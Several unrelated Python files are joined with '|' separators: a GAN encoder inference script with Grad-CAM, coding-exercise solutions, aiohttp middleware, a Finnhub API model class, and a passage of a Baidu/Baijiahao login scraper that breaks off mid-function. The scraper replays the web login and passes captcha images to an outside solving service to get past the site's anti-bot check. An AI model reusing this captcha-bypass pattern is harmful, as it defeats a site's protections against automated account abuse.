print('error')
return
if args.checkpoint_dir_E != None:
E.load_state_dict(torch.load(args.checkpoint_dir_E))
E.cuda()
writer = tensor_writer
batch_size = args.batch_size
#vgg16->Grad-CAM
vgg16 = torchvision.models.vgg16(pretrained=True).cuda()
final_layer = None
for name, m in vgg16.named_modules():
if isinstance(m, nn.Conv2d):
final_layer = name
grad_cam_plus_plus = GradCamPlusPlus(vgg16, final_layer)
gbp = GuidedBackPropagation(vgg16)
seed = 4 # 0, 1, 4
set_seed(seed)
z = torch.randn(batch_size, args.z_dim) #[32, 512]
if type == 1:
with torch.no_grad(): #这里需要生成图片和变量
w1 = Gm(z,coefs_m=coefs).cuda() #[batch_size,18,512]
imgs1 = Gs.forward(w1,int(math.log(args.img_size,2)-2)) # 7->512 / 6->256
elif type == 2:
with torch.no_grad():
result_all = generator(z.cuda(), **synthesis_kwargs)
imgs1 = result_all['image']
w1 = result_all['wp']
elif type == 3:
with torch.no_grad(): #这里需要生成图片和变量
w1 = z.cuda()
result_all = generator(w1)
imgs1 = result_all['image']
elif type == 4:
z = truncated_noise_sample(truncation=0.4, batch_size=batch_size, seed=seed)
#label = np.random.randint(1000,size=batch_size) # 生成标签
flag = np.random.randint(1000)
label = np.ones(batch_size)
label = flag * label
label = one_hot(label)
w1 = torch.tensor(z, dtype=torch.float).cuda()
conditions = torch.tensor(label, dtype=torch.float).cuda() # as label
truncation = torch.tensor(0.4, dtype=torch.float).cuda()
with torch.no_grad(): #这里需要生成图片和变量
imgs1, const1 = generator(w1, conditions, truncation) # const1 are conditional vectors in BigGAN
if type != 4:
const2,w2 = E(imgs1)
else:
const2,w2 = E(imgs1, const1)
if type == 1:
imgs2=Gs.forward(w2,int(math.log(args.img_size,2)-2))
elif type == 2 or type == 3:
imgs2=generator.synthesis(w2)['image']
elif type == 4:
imgs2, _ = generator(w2, conditions, truncation)
else:
print('model type error')
return
#Image Vectors
mask_1 = grad_cam_plus_plus(imgs1.detach().clone(),None) #[c,1,h,w]
mask_2 = grad_cam_plus_plus(imgs2.detach().clone(),None)
# imgs1.retain_grad()
# imgs2.retain_grad()
imgs1_ = imgs1.detach().clone()
imgs1_.requires_grad = True
imgs2_ = imgs2.detach().clone()
imgs2_.requires_grad = True
grad_1 = gbp(imgs1_) # [n,c,h,w]
grad_2 = gbp(imgs2_)
heatmap_1,cam_1 = mask2cam(mask_1.detach().clone(),imgs1.detach().clone())
heatmap_2,cam_2 = mask2cam(mask_2.detach().clone(),imgs2.detach().clone())
for i,j in enumerate(imgs1):
torchvision.utils.save_image(j.unsqueeze(0)*0.5+0.5, resultPath1_1+'/seed%d_iter%d.png'%(seed,i),nrow=1)
for i,j in enumerate(imgs2):
torchvision.utils.save_image(j.unsqueeze(0)*0.5+0.5, resultPath1_1+'/seed%d_iter%d-rc.png'%(seed,i),nrow=1)
for i,j in enumerate(heatmap_1):
torchvision.utils.save_image(j.unsqueeze(0), resultPath_grad_cam+'/seed%d_iter%d-heatmap.png'%(seed,i),nrow=1)
for i,j in enumerate(heatmap_2):
torchvision.utils.save_image(j.unsqueeze(0), resultPath_grad_cam+'/seed%d_iter%d-heatmap-rc.png'%(seed,i),nrow=1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='the training args')
parser.add_argument('--iterations', type=int, default=210000)
parser.add_argument('--lr', type=float, default=0.0015)
parser.add_argument('--beta_1', type=float, default=0.0)
parser.add_argument('--batch_size', type=int, default=10)
parser.add_argument('--experiment_dir', default=None)
parser.add_argument('--checkpoint_dir_GAN', default='./checkpoint/stylegan_v2/stylegan2_cat256.pth')
parser.add_argument('--config_dir', default='./checkpoint/biggan/256/biggan-deep-256-config.json') # BigGAN needs it
parser.add_argument('--checkpoint_dir_E', default='./checkpoint/E/E_Cat_styleganv2_ep6.pth')#'./result/StyleGAN1-car512-Aligned-modelV2/models/E_model_iter100000.pth'
parser.add_argument('--img_size',type=int, default=256)
parser.add_argument('--img_channels', type=int, default=3)# RGB:3 ,L:1
parser.add_argument('--z_dim', type=int, default=512) # BigGAN,z=128
parser.add_argument('--mtype', type=int, default=2) # StyleGANv1=1, StyleGANv2=2, PGGAN=3, BigGAN00
parser.add_argument('--start_features', type=int, default=64) # 16->1024 32->512 64->256
args = parser.parse_args()
if not os.path.exists('./result'): os.mkdir('./result')
resultPath = args.experiment_dir
if resultPath == None:
resultPath = "./result/infer_cat256_ep6_styleganv2"
if not os.path.exists(resultPath): os.mkdir(resultPath)
resultPath1_1 = resultPath+"/imgs"
if not os.path.exists(resultPath1_1): os.mkdir(resultPath1_1)
resultPath1_2 = resultPath+"/models"
if not os.path.exists(resultPath1_2): os.mkdir(resultPath1_2)
resultPath_grad_cam = resultPath+"/grad_cam"
if not os.path.exists(resultPath_grad_cam): os.mkdir(resultPath_grad_cam)
use_gpu = True
device = torch.device("cuda" if use_gpu else "cpu")
writer_path = os.path.join(resultPath, './summaries')
if not os.path.exists(writer_path): os.mkdir(writer_path)
writer = tensorboardX.SummaryWriter(writer_path)
train(tensor_writer=writer, args= args)
|
"""
LeetCode Problem: 22. Generate Parentheses
Link: https://leetcode.com/problems/generate-parentheses/submissions/
Language: Python
Written by: Mostofa Adib Shakib
Time complexity: Bounded by a catalan number
"""
"""
Conditions that makes parenthesis balanced:
1) An empty string is a string in which parenthesis are balanced.
2) The addition of a leading left parenthesis and a trailing right parenthesis to a string in which parenthesis are matched.
3) The concatenation of two strings in which parenthesis are balanced results in a new string where the parenthesis are also balanced.
Constraits:
1) The number of opening parenthesis should be less than the twice the maximum of pair required(Condition 1)
2) The number of closing parenthesis should be less than the number of opening parenthesis(Condition 2)
"""
class Solution(object):
def generateParenthesis(self, n):
"""
:type n: int
:rtype: List[str]
"""
def backtrack(array, current_string, NoleftParenthesis, NoRightParenthesis, maximumLength):
if len(current_string) == maximumLength *2: # if have found one of the solutions
array.append(current_string)
return
if NoleftParenthesis < maximumLength: # we can place an opening parenthesis
backtrack(array, current_string + '(', NoleftParenthesis+1, NoRightParenthesis, maximumLength)
if NoRightParenthesis < NoleftParenthesis: # we can place a closing parenthesis
backtrack(array, current_string + ')', NoleftParenthesis, NoRightParenthesis+1, maximumLength)
array = [] # the array containing all the solutions
backtrack(array, "", 0, 0, n) # calling the helper method
return array # returns the answer array at the end
|
# This package contains all the files for those advent days starting with a zero ('01' for day 1, et cetera).
|
# -*- coding: UTF-8 -*-
__author__ = "Liu Fei"
__github__ = "http://github.com/lfblogs"
__all__ = [
"logger_factory",
"data_factory",
"response_factory",
]
"""
"""
import asyncio
import json
try:
from aiohttp import web
except ImportError:
from aio2py.required.aiohttp import web
import logging
@asyncio.coroutine
def logger_factory(app, handler):
@asyncio.coroutine
def logger(request):
logging.info('Request: %s %s' % (request.method, request.path))
return (yield from handler(request))
return logger
@asyncio.coroutine
def data_factory(app, handler):
@asyncio.coroutine
def parse_data(request):
if request.method == 'POST':
if request.content_type.startswith('application/json'):
request.__data__ = yield from request.json()
logging.info('request json: %s' % str(request.__data__))
elif request.content_type.startswith('application/x-www-form-urlencoded'):
request.__data__ = yield from request.post()
logging.info('request form: %s' % str(request.__data__))
return (yield from handler(request))
return parse_data
@asyncio.coroutine
def response_factory(app, handler):
@asyncio.coroutine
def response(request):
logging.info('Response handler...')
r = yield from handler(request)
if isinstance(r, web.StreamResponse):
return r
if isinstance(r, bytes):
resp = web.Response(body=r)
resp.content_type = 'application/octet-stream'
return resp
if isinstance(r, str):
if r.startswith('redirect:'):
return web.HTTPFound(r[9:])
resp = web.Response(body=r.encode('utf-8'))
resp.content_type = 'text/html;charset=utf-8'
return resp
if isinstance(r, dict):
template = r.get('__template__')
if template is None:
resp = web.Response(body=json.dumps(r, ensure_ascii=False, default=lambda o: o.__dict__).encode('utf-8'))
resp.content_type = 'application/json;charset=utf-8'
return resp
else:
resp = False
try:
r['__user__'] = request.__user__
except:
r['__user__'] = ''
if isinstance(app['__templating__'], list):
for index,i in enumerate(app['__templating__']):
try:
app['__templating__'][index].get_template(template)
except:
pass
else:
resp = web.Response(body=app['__templating__'][index].get_template(template).render(**r).encode('utf-8'))
resp.content_type = 'text/html;charset=utf-8'
break
else:
resp = web.Response(body=app['__templating__'].get_template(template).render(**r).encode('utf-8'))
resp.content_type = 'text/html;charset=utf-8'
if resp:
return resp
else:
raise FileNotFoundError('template file {} is not found'.format(template))
if isinstance(r, int) and r >= 100 and r < 600:
return web.Response(r)
if isinstance(r, tuple) and len(r) == 2:
t, m = r
if isinstance(t, int) and t >= 100 and t < 600:
return web.Response(t, str(m))
# default:
resp = web.Response(body=str(r).encode('utf-8'))
resp.content_type = 'text/plain;charset=utf-8'
return resp
return response
|
# -*- coding: utf-8 -*-
from werkzeug.wrappers import Response, Request
@Request.application
def application(request):
return Response('Hello world')
if __name__ == '__main__':
from werkzeug.serving import run_simple
run_simple('0.0.0.0', 4000, application)
|
# coding: utf-8
"""
Finnhub API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from finnhub.configuration import Configuration
class MergerCountry(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'announcement_date': 'datetime',
'deal_size': 'float',
'status': 'str',
'target_name': 'str',
'target_nation': 'str',
'acquirer_name': 'str',
'acquirer_nation': 'str',
'form': 'str',
'target_industry': 'str',
'acquirer_industry': 'str',
'target_description': 'str',
'acquirer_description': 'str',
'target_region': 'str',
'acquirer_region': 'str',
'target_public_status': 'str',
'acquirer_public_status': 'str',
'deal_attitude': 'str',
'netincome_multiple': 'float',
'percent_acquired': 'float'
}
attribute_map = {
'announcement_date': 'announcementDate',
'deal_size': 'dealSize',
'status': 'status',
'target_name': 'targetName',
'target_nation': 'targetNation',
'acquirer_name': 'acquirerName',
'acquirer_nation': 'acquirerNation',
'form': 'form',
'target_industry': 'targetIndustry',
'acquirer_industry': 'acquirerIndustry',
'target_description': 'targetDescription',
'acquirer_description': 'acquirerDescription',
'target_region': 'targetRegion',
'acquirer_region': 'acquirerRegion',
'target_public_status': 'targetPublicStatus',
'acquirer_public_status': 'acquirerPublicStatus',
'deal_attitude': 'dealAttitude',
'netincome_multiple': 'netincomeMultiple',
'percent_acquired': 'percentAcquired'
}
def __init__(self, announcement_date=None, deal_size=None, status=None, target_name=None, target_nation=None, acquirer_name=None, acquirer_nation=None, form=None, target_industry=None, acquirer_industry=None, target_description=None, acquirer_description=None, target_region=None, acquirer_region=None, target_public_status=None, acquirer_public_status=None, deal_attitude=None, netincome_multiple=None, percent_acquired=None, local_vars_configuration=None): # noqa: E501
"""MergerCountry - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._announcement_date = None
self._deal_size = None
self._status = None
self._target_name = None
self._target_nation = None
self._acquirer_name = None
self._acquirer_nation = None
self._form = None
self._target_industry = None
self._acquirer_industry = None
self._target_description = None
self._acquirer_description = None
self._target_region = None
self._acquirer_region = None
self._target_public_status = None
self._acquirer_public_status = None
self._deal_attitude = None
self._netincome_multiple = None
self._percent_acquired = None
self.discriminator = None
if announcement_date is not None:
self.announcement_date = announcement_date
if deal_size is not None:
self.deal_size = deal_size
if status is not None:
self.status = status
if target_name is not None:
self.target_name = target_name
if target_nation is not None:
self.target_nation = target_nation
if acquirer_name is not None:
self.acquirer_name = acquirer_name
if acquirer_nation is not None:
self.acquirer_nation = acquirer_nation
if form is not None:
self.form = form
if target_industry is not None:
self.target_industry = target_industry
if acquirer_industry is not None:
self.acquirer_industry = acquirer_industry
if target_description is not None:
self.target_description = target_description
if acquirer_description is not None:
self.acquirer_description = acquirer_description
if target_region is not None:
self.target_region = target_region
if acquirer_region is not None:
self.acquirer_region = acquirer_region
if target_public_status is not None:
self.target_public_status = target_public_status
if acquirer_public_status is not None:
self.acquirer_public_status = acquirer_public_status
if deal_attitude is not None:
self.deal_attitude = deal_attitude
if netincome_multiple is not None:
self.netincome_multiple = netincome_multiple
if percent_acquired is not None:
self.percent_acquired = percent_acquired
@property
def announcement_date(self):
"""Gets the announcement_date of this MergerCountry. # noqa: E501
Announcement date of the deal. # noqa: E501
:return: The announcement_date of this MergerCountry. # noqa: E501
:rtype: datetime
"""
return self._announcement_date
@announcement_date.setter
def announcement_date(self, announcement_date):
"""Sets the announcement_date of this MergerCountry.
Announcement date of the deal. # noqa: E501
:param announcement_date: The announcement_date of this MergerCountry. # noqa: E501
:type: datetime
"""
self._announcement_date = announcement_date
@property
def deal_size(self):
"""Gets the deal_size of this MergerCountry. # noqa: E501
Deal size in millions of USD. # noqa: E501
:return: The deal_size of this MergerCountry. # noqa: E501
:rtype: float
"""
return self._deal_size
@deal_size.setter
def deal_size(self, deal_size):
"""Sets the deal_size of this MergerCountry.
Deal size in millions of USD. # noqa: E501
:param deal_size: The deal_size of this MergerCountry. # noqa: E501
:type: float
"""
self._deal_size = deal_size
@property
def status(self):
"""Gets the status of this MergerCountry. # noqa: E501
Deal status. # noqa: E501
:return: The status of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this MergerCountry.
Deal status. # noqa: E501
:param status: The status of this MergerCountry. # noqa: E501
:type: str
"""
self._status = status
@property
def target_name(self):
"""Gets the target_name of this MergerCountry. # noqa: E501
Target company name. # noqa: E501
:return: The target_name of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._target_name
@target_name.setter
def target_name(self, target_name):
"""Sets the target_name of this MergerCountry.
Target company name. # noqa: E501
:param target_name: The target_name of this MergerCountry. # noqa: E501
:type: str
"""
self._target_name = target_name
@property
def target_nation(self):
"""Gets the target_nation of this MergerCountry. # noqa: E501
Target company country. # noqa: E501
:return: The target_nation of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._target_nation
@target_nation.setter
def target_nation(self, target_nation):
"""Sets the target_nation of this MergerCountry.
Target company country. # noqa: E501
:param target_nation: The target_nation of this MergerCountry. # noqa: E501
:type: str
"""
self._target_nation = target_nation
@property
def acquirer_name(self):
"""Gets the acquirer_name of this MergerCountry. # noqa: E501
Acquirer name. # noqa: E501
:return: The acquirer_name of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._acquirer_name
@acquirer_name.setter
def acquirer_name(self, acquirer_name):
"""Sets the acquirer_name of this MergerCountry.
Acquirer name. # noqa: E501
:param acquirer_name: The acquirer_name of this MergerCountry. # noqa: E501
:type: str
"""
self._acquirer_name = acquirer_name
@property
def acquirer_nation(self):
"""Gets the acquirer_nation of this MergerCountry. # noqa: E501
Acquirer nation. # noqa: E501
:return: The acquirer_nation of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._acquirer_nation
@acquirer_nation.setter
def acquirer_nation(self, acquirer_nation):
"""Sets the acquirer_nation of this MergerCountry.
Acquirer nation. # noqa: E501
:param acquirer_nation: The acquirer_nation of this MergerCountry. # noqa: E501
:type: str
"""
self._acquirer_nation = acquirer_nation
@property
def form(self):
"""Gets the form of this MergerCountry. # noqa: E501
Deal form. # noqa: E501
:return: The form of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._form
@form.setter
def form(self, form):
"""Sets the form of this MergerCountry.
Deal form. # noqa: E501
:param form: The form of this MergerCountry. # noqa: E501
:type: str
"""
self._form = form
@property
def target_industry(self):
"""Gets the target_industry of this MergerCountry. # noqa: E501
Target company industry. # noqa: E501
:return: The target_industry of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._target_industry
@target_industry.setter
def target_industry(self, target_industry):
"""Sets the target_industry of this MergerCountry.
Target company industry. # noqa: E501
:param target_industry: The target_industry of this MergerCountry. # noqa: E501
:type: str
"""
self._target_industry = target_industry
@property
def acquirer_industry(self):
"""Gets the acquirer_industry of this MergerCountry. # noqa: E501
Deal form. # noqa: E501
:return: The acquirer_industry of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._acquirer_industry
@acquirer_industry.setter
def acquirer_industry(self, acquirer_industry):
"""Sets the acquirer_industry of this MergerCountry.
Deal form. # noqa: E501
:param acquirer_industry: The acquirer_industry of this MergerCountry. # noqa: E501
:type: str
"""
self._acquirer_industry = acquirer_industry
@property
def target_description(self):
"""Gets the target_description of this MergerCountry. # noqa: E501
Target company business summary. # noqa: E501
:return: The target_description of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._target_description
@target_description.setter
def target_description(self, target_description):
"""Sets the target_description of this MergerCountry.
Target company business summary. # noqa: E501
:param target_description: The target_description of this MergerCountry. # noqa: E501
:type: str
"""
self._target_description = target_description
@property
def acquirer_description(self):
"""Gets the acquirer_description of this MergerCountry. # noqa: E501
Acquirer business summary. # noqa: E501
:return: The acquirer_description of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._acquirer_description
@acquirer_description.setter
def acquirer_description(self, acquirer_description):
"""Sets the acquirer_description of this MergerCountry.
Acquirer business summary. # noqa: E501
:param acquirer_description: The acquirer_description of this MergerCountry. # noqa: E501
:type: str
"""
self._acquirer_description = acquirer_description
@property
def target_region(self):
"""Gets the target_region of this MergerCountry. # noqa: E501
Target company region. # noqa: E501
:return: The target_region of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._target_region
@target_region.setter
def target_region(self, target_region):
"""Sets the target_region of this MergerCountry.
Target company region. # noqa: E501
:param target_region: The target_region of this MergerCountry. # noqa: E501
:type: str
"""
self._target_region = target_region
@property
def acquirer_region(self):
"""Gets the acquirer_region of this MergerCountry. # noqa: E501
Acquirer company region. # noqa: E501
:return: The acquirer_region of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._acquirer_region
@acquirer_region.setter
def acquirer_region(self, acquirer_region):
"""Sets the acquirer_region of this MergerCountry.
Acquirer company region. # noqa: E501
:param acquirer_region: The acquirer_region of this MergerCountry. # noqa: E501
:type: str
"""
self._acquirer_region = acquirer_region
@property
def target_public_status(self):
"""Gets the target_public_status of this MergerCountry. # noqa: E501
Target company public status. # noqa: E501
:return: The target_public_status of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._target_public_status
@target_public_status.setter
def target_public_status(self, target_public_status):
"""Sets the target_public_status of this MergerCountry.
Target company public status. # noqa: E501
:param target_public_status: The target_public_status of this MergerCountry. # noqa: E501
:type: str
"""
self._target_public_status = target_public_status
@property
def acquirer_public_status(self):
"""Gets the acquirer_public_status of this MergerCountry. # noqa: E501
Acquirer company public status. # noqa: E501
:return: The acquirer_public_status of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._acquirer_public_status
@acquirer_public_status.setter
def acquirer_public_status(self, acquirer_public_status):
"""Sets the acquirer_public_status of this MergerCountry.
Acquirer company public status. # noqa: E501
:param acquirer_public_status: The acquirer_public_status of this MergerCountry. # noqa: E501
:type: str
"""
self._acquirer_public_status = acquirer_public_status
@property
def deal_attitude(self):
"""Gets the deal_attitude of this MergerCountry. # noqa: E501
Deal attitude. # noqa: E501
:return: The deal_attitude of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._deal_attitude
@deal_attitude.setter
def deal_attitude(self, deal_attitude):
"""Sets the deal_attitude of this MergerCountry.
Deal attitude. # noqa: E501
:param deal_attitude: The deal_attitude of this MergerCountry. # noqa: E501
:type: str
"""
self._deal_attitude = deal_attitude
@property
def netincome_multiple(self):
"""Gets the netincome_multiple of this MergerCountry. # noqa: E501
Net Income Multiple. # noqa: E501
:return: The netincome_multiple of this MergerCountry. # noqa: E501
:rtype: float
"""
return self._netincome_multiple
@netincome_multiple.setter
def netincome_multiple(self, netincome_multiple):
"""Sets the netincome_multiple of this MergerCountry.
Net Income Multiple. # noqa: E501
:param netincome_multiple: The netincome_multiple of this MergerCountry. # noqa: E501
:type: float
"""
self._netincome_multiple = netincome_multiple
@property
def percent_acquired(self):
"""Gets the percent_acquired of this MergerCountry. # noqa: E501
Percent acquired. # noqa: E501
:return: The percent_acquired of this MergerCountry. # noqa: E501
:rtype: float
"""
return self._percent_acquired
@percent_acquired.setter
def percent_acquired(self, percent_acquired):
"""Sets the percent_acquired of this MergerCountry.
Percent acquired. # noqa: E501
:param percent_acquired: The percent_acquired of this MergerCountry. # noqa: E501
:type: float
"""
self._percent_acquired = percent_acquired
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, MergerCountry):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, MergerCountry):
return True
return self.to_dict() != other.to_dict()
|
# Take 2 input sets A and B
input()
A = set(map(int, input().split()))
input()
B = set(map(int, input().split()))
# Print difference by symmetric_difference
print(len(A.symmetric_difference(B)))
|
import re
import time
import datetime
import requests
import execjs
import json
import rsa
import base64
import os
from lib.mp.base import Base
from lib.yundama import verify_captcha
from lib.tools.custom_exception import CustomException
from lib.tools import toutiao_login_js
class BaiJia(Base):
mp_id = 3
zh_name = '百家号'
feed_cat = {'创意': '18', '美食': '22', '科学': '32', '女人': '21', '美图': '20', '辟谣': '38', '三农': '35', '游戏': '13',
'两性': '25', '房产': '9',
'娱乐': '4', '宠物': '31', '科技': '8', '汽车': '10', '军事': '14', '情感': '26', '生活': '16', '家居': '23',
'教育': '11', '悦读': '37',
'时尚': '12', '历史': '30', '职场': '34', '体育': '3', '国际': '1', '搞笑': '19', '健康': '24', '动漫': '33',
'育儿': '28',
'文化': '29', '财经': '6', '互联网': '7', '旅游': '15', '社会': '5'}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36'}
@staticmethod
def login(user, pswd, **kw):
BaiJia.logger.info(user)
session = requests.session()
session.headers.update(BaiJia.headers)
session.get('https://pan.baidu.com')
gid = BaiJia._get_runntime().call('getGid')
callback = BaiJia._get_runntime().call('getCallback')
traceid = BaiJia._get_runntime().call('createHeadID')
token = BaiJia.get_token(gid, callback, session)
pubkey, key = BaiJia.get_rsa_key(token, gid, callback, session, traceid)
pub = rsa.PublicKey.load_pkcs1_openssl_pem(pubkey.encode('utf-8'))
encript_passwd = rsa.encrypt(pswd.encode('utf-8'), pub)
password = base64.b64encode(encript_passwd).decode('utf-8')
post_data = {
"staticpage": "https://pan.baidu.com/res/static/thirdparty/pass_v3_jump.html",
"charset": "UTF-8",
"token": token,
"tpl": "netdisk",
"subpro": "netdisk_web",
"apiver": "v3",
"tt": int(time.time() * 1000),
"codestring": "",
"safeflg": "0",
"u": "https://pan.baidu.com/disk/home",
"isPhone": "",
"detect": "1",
"gid": gid,
"quick_user": "0",
"logintype": "basicLogin",
"logLoginType": "pc_loginBasic",
"idc": "",
"loginmerge": "true",
"foreignusername": "",
"username": user,
"password": password,
"mem_pass": "on",
"rsakey": key,
"crypttype": "12",
"ppui_logintime": "87162",
"countrycode": "",
"fp_uid": "",
"fp_info": "",
"loginversion": "v4",
# "ds": "Hod9Kug32hLv7vGhxTCcWJVf/QXQYFHc8PZPH0+zODP158rYpLIoKIpgsiwjnpDmOW9UaBLEXW4X5efR6Sz7Uaq4zPr3sW4PzQYlNaMthOQ8jzhIFE73wsuCDuKkDB7Yy0zcxKXYbdPwb2QtOdt6p3vo7CID9dUWOeZezxJhdunwl7NmOFnoLWS/3I3EYOEcYt5ijPSv/ec154vXGAjR7+1gxkTP7VTxHDHHNccMRWR6y+lfhIQPEztmgZta6nuYtHZNqkYw6+wzkVX17Wm8pkLKQ1gLXBLK4gUgX4cReWEXWMR+6brnSuExcCsbiiQNiXYfjcuP3Eb81ELieJu0649Wt3sDofhLv2/efpuX+OmNnArLWYHL5S6O45L5nAwhUIayWwd797vrQtP/dufnYNezxx6tfEqA3Fmz/YiAJPRBzyiVd7GHkbIfeTmu/6dldEV+22xqtqlZFZMacR7OvhsurN0WVixqyr1jxrI9sPShMprA2z0QThgt1gySZe1BENPUom/e7FkvpacpMB0nWPCoe4G/HY6mTXw1zOkoHUfOurV6u1hPOBFJgzWkMbqWHO+bzazSQZ0XWEauKOr/jooE1JTplQlEXQEO/dx37dlsoHQO8h0Pp9CNs86noYbaQnoTS+7iFIfKMpYyz8IJ14ptmGnOx+NVEXBIfy5eN75eW2l82JUd6xhGyZ0RSIgYoIBv3/sHRhVmvlDgex6AxbRbq7muho8lk7Auj5IVnldC8nYFhogldtRuaLY34wJv25PHQNNmnVc/rbZNcrDmKtTHVvZ3LHDjIfE6TNTAiq+nOf4WaG44P8vBeWQYOV/6Jf3c1D+5cY/1f3Ubg23JWCJCSKAe9RsuXDybUeRmmNW9tEIjeKz2xVyvL9EfgX/VO/AspyTDdTr6hOp4zZ1Jruo9fEXjoW3hP5oh58FkqfAJoZiAsoGs31PeUPvXSaOpOm6ERI67VeVhXi3W9XB01xSvFiVtZk1LZh/Z2MnU7268sPARwZ9fP15CI3kYlIStnnYoSOoOjLbdMqztJKioaQGDhI4UNLMxkuueeieEoBiIpeDV2678VkvoG+ZhDEkmCFboX7yS01uILrfBc9fh9XbaF1sTOLsT2acMt34nFgoujbBkq6UW/K1tGqQNpWQHss/xb65WjgU5Cstpw1TgSsw/qetKeGlNkQt+mya+PPdr2q+lCbN9HufaeBor4cDKXXHVcFwbkibIZcrYwAW8yZ0xCZREZplCTDmBuscgf8rU3FmThstzx1vc80yGYqs+qVdzWjy9uDMuEwHPHvK6HlLhnySOgb/5TSNljcYARXk=",
# "tk": "2006TG/w+3FOc0s137wM1+PWMcG/pf+Rcr2Z9GcdGBPugJU=",
# "dv": "tk0.10998763779832511551159571840@mmr0hm94nxpkqGPQIGPmf-Ckq~9zf-943G9m-jOL-GpkniC4JX0kn-7rffpvxyPvfG94B~94Ow94nxpkqGPQIGPmf-C4qH76f-943G9m-jOL-Gpkny9W9y0q__vr0uv94qHCHfH9WJGCku~9m-w74D-pkux7mf-CWNR9m-w949yCmfRCRnGCk5fCkNG0knHCR3G9RuxpkBx94Bzp2oh43OrBJy0Kyh4J2wiKyYyDXIH4Z2gMKf-945ipk9X7rfX7k5X91-JBJx6J32CKyYBJyh0C2Y0Dv2RDzOeDZowxkkECku4nCODhurh9rfHpkDHGrQOvGfpWnf743~CRNRCRDx7k9HC4n-C4J-94JxC4D-7kBfhrQE6oiD69apHYfNL~jNZ2UM6JjNXYgpH-yPZoTMZTjMLB_~rs9mffpkn~7kDG74nXpknx9WqG94q~9mf-74ufpknx9WqG94qi7q__",
"traceid": traceid,
"callback": "parent." + callback,
}
resp = session.post(url='https://passport.baidu.com/v2/api/?login', data=post_data)
ss = resp.text
if 'err_no=0' in ss or 'err_no=23' in ss or 'err_no=400037' in ss or 'err_no=5' in ss:
cookies = session.cookies.get_dict()
return cookies, ''
else:
cookies = BaiJia.break_code(ss, session, post_data)
session.cookies = requests.cookies.cookiejar_from_dict(cookies)
resp = session.get('https://baijiahao.baidu.com/builder/app/appinfo').json()
if resp['errmsg'] == 'success':
BaiJia.logger.info('成功')
cookies = session.cookies.get_dict()
u_name = resp['data']['user']['username']
BaiJia.logger.info(u_name)
return cookies, u_name
raise CustomException('账号或密码错误')
@staticmethod
def break_code(ss, session, post_data):
flag = 5
while flag:
time.sleep(1)
BaiJia.logger.info('重试{}次'.format(flag))
callback = re.findall(r'callback=(.*?)&codeString', ss)[0]
get_code = re.findall(r'codeString=(.*?)&userName', ss)[0]
if not get_code:
result = ''
else:
code = session.get("https://passport.baidu.com/cgi-bin/genimage", params=get_code, stream=True)
if code.status_code == 200:
with open("code.png", 'wb') as f:
f.write(code.content)
cid, result = verify_captcha('code.png', 5000)
if os.path.exists('code.png'):
os.remove('code.png')
post_data['verifycode'] = result
post_data['codestring'] = get_code
post_data['callback'] = callback
time.sleep(0.5)
ss = session.post(url='https://passport.baidu.com/v2/api/?login', data=post_data)
ss = ss.text
BaiJia.logger.info(flag)
BaiJia.logger.info(ss)
if 'err_no=0' in ss or 'err_no=23' in ss or 'err_no=400037' in ss or 'err_no=5' in ss:
cookies = session.cookies.get_dict()
return cookies
else:
flag -= 1
err = re.compile(r'"err_no=(.*?)&').findall(ss)[0]
BaiJia.logger.info(err)
if err == "120021":
msg = '请用手机短信登录'
elif err == "257":
msg = '请输入验证码'
else:
msg = '账号密码不对'
raise CustomException(msg)
@staticmethod
def get_token(gid, callback, session):
get_data = {
'tpl': 'netdisk',
'subpro': 'netdisk_web',
'apiver': 'v3',
'tt': int(time.time() * 1000),
'class': 'login',
'gid': gid,
'logintype': 'basicLogin',
'callback': callback
}
session.cookies.update(
dict(HOSUPPORT='1', expires='Sat, 15-May-2027 03:42:54 GMT; path=/', domain='passport.baidu.com; httponly'))
resp = session.get(url='https://passport.baidu.com/v2/api/?getapi', params=get_data)
if resp.status_code == 200 and callback in resp.text:
data = json.loads(re.search(r'.*?\((.*)\)', resp.text).group(1).replace("'", '"'))
return data.get('data').get('token')
else:
print('获取token失败')
return None
@staticmethod
def get_rsa_key(token, gid, callback, session, traceid):
get_data = {
'token': token,
'tpl': 'netdisk',
'subpro': 'netdisk_web',
